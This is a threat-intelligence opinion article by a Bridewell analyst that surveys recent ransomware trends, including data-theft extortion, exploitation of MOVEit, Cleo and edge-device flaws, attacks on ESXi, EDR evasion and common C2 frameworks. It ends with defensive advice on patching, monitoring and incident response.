As cybersecurity threats continue to grow in scale, sophistication and intent, it’s vital for organizations to understand the top actors, emerging risks and evolving techniques shaping the landscape to help strengthen cyber defenses.
A recent report by Bridewell highlights just how dynamic the adversarial environment has become over the past year.
Gavin Knapp
Social Links Navigation
Cyber Threat Intelligence Principal Lead at Bridewell.
Threat actors have shifted behaviors, refined their tooling and adapted their tactics.
You may like
Here are some key takeaways organizations need to know to contend with imminent threats.
The Rise of Data Theft and Extortion
Historically, ransomware tactics were primarily centered around encrypting victim data and demanding payment for decryption keys. However, recent attacks highlight a shift in tactics, with threat actors now prioritizing data theft and extortion by threatening to publish stolen information unless ransoms are paid.
This was witnessed in an attack on UK telecom provider Colt Technology Services, where the Warlock ransomware group exploited a vulnerability in Microsoft SharePoint to infiltrate the company’s systems.
The attackers stole several hundred gigabytes of sensitive data, including employee salary information, financial records, customer contracts and network architecture details. As a result of not paying the ransom, the group subsequently posted a file list on a Russian Tor forum, offering over a million documents for sale.
Similarly, the Clop ransomware group demonstrated this shift in May 2023 by exploiting a zero-day vulnerability in the MOVEit file‑transfer software (CVE‑2023‑34362) to exfiltrate large volumes of data from hundreds of organizations, including high-profile companies such as the BBC and Boots. Rather than just encrypting systems, Clop threatened to publicly publish the stolen information via its leak site.
This evolution exploits the growing regulatory and reputational pressures organizations face, particularly in jurisdictions with strict privacy laws. While encryption-based attacks often result in larger individual ransom demands due to the urgency of restoring critical services. Also, improvements in data recovery and backup controls have inadvertently made data theft and extortion a more effective alternative for attackers.
The recent major data theft operations performed by hacker groups such as Scattered Spider and Shiny Hunters, who are related to a collective known as the “Com” or the “Community” have targeted large software service providers such as Salesforce and other companies that integrate with their platform. This has highlighted again the appetite to use data theft and extortion over deploying ransomware to encrypt the victims files.
You may like
Exploitation of Vulnerabilities and Edge Devices
Unpatched vulnerabilities in internet-facing systems and edge devices remain a primary attack vector for ransomware groups. Attackers are exploiting flaws in widely deployed technologies including VPNs, remote monitoring tools, and network appliances, to gain initial access into company systems. These vulnerabilities allow mass compromise at scale and are a major contributor to successful ransomware campaigns.
In 2024 infamous ransomware groups, Clop and Termite, emerged as highly proficient actors in carrying out attacks against managed file transfer services. Additionally, earlier this year, Clop targeted Cleo, the enterprise integration and managed file transfer software provider, by exploiting a zero-day vulnerability (CVE-2024-50623) in its integration software.
This attack affected over 80 organizations, primarily in the telecommunications and healthcare sectors, resulting in significant data exposure and operational disruption. More recently, we have seen several threat actors conducting widespread attacks targeting unpatched Fortinet, Cisco and Ivanti devices. This includes access brokers and affiliates associated with Qilin, Akira and Ransomhub ransomware groups.
Ransomware actors continue to target hypervisors such as VMware ESXi environments, with the intention of disrupting critical IT infrastructure quickly. Groups such as VanHelsing and DragonForce have been linked to recent attacks, actively employing this tactic in ongoing campaigns.
Meanwhile, the adversaries are shifting their efforts towards developing capabilities to evade Endpoint Detection and Response (EDR) systems, known as ‘EDR killers’, which is often achieved by the abuse of vulnerable drivers or native software features.
The success of these attacks has been amplified by the increased use of Living-Off-the-Land Binaries (LOLBINs) and Remote Monitoring and Management (RMM) tools, another method used to evade EDR tools by enabling threat actors to blend in with normal system or environment operations to remain unnoticed, making detection and mitigation significantly more difficult for organizations.
Offensive security tools remain central to ransomware operations. Despite combined efforts by Microsoft’s Digital Crimes Unit (DCU), Fortra, and the Health Information Sharing and Analysis Center (Health-ISAC) in recent years to combat the use of authorized, legacy copies of Cobalt Strike, it remains the most widely used offensive security tool among ransomware operators.
While Fortra has reported an 80% reduction in unauthorized copies observed in the wild over the past two years, in reality the situation remains a cat-and-mouse game as malicious C2 infrastructure is removed from more reputable hosting providers, operators simply relocate it to less reputable ones.
Even so, this shift still presents some tactical advantages for defenders, as infrastructure hosted on lower-tier providers is more likely to be blocked by security products such as next-generation firewalls and web proxies.
Meanwhile, other offensive tools such as Metasploit, Sliver, Brute Ratel and more recently variants such as Pyramid C2, a Python-based command and control (C2) framework and Adaptix C2 are steadily gaining popularity.
Final thoughts
As we move into 2026, it’s clear that cybercriminals are becoming more agile, more opportunistic and more determined to exploit both technical weaknesses and organizational blind spots. With data‑theft‑first extortion models on the rise, increased targeting of edge devices, and the continued refinement of EDR‑evading tools, defenders face a rapidly evolving challenge that demands equal adaptability.
Organizations must prioritize proactive patching, strengthen monitoring across hybrid environments and invest in threat intelligence that keeps pace with adversaries’ shifting tactics. Those that build resilience now, through preparedness, visibility and robust incident response, will be best positioned to withstand the threats that lie ahead.
Find the best Antivirus Software: expert reviews, testing, and rankings.
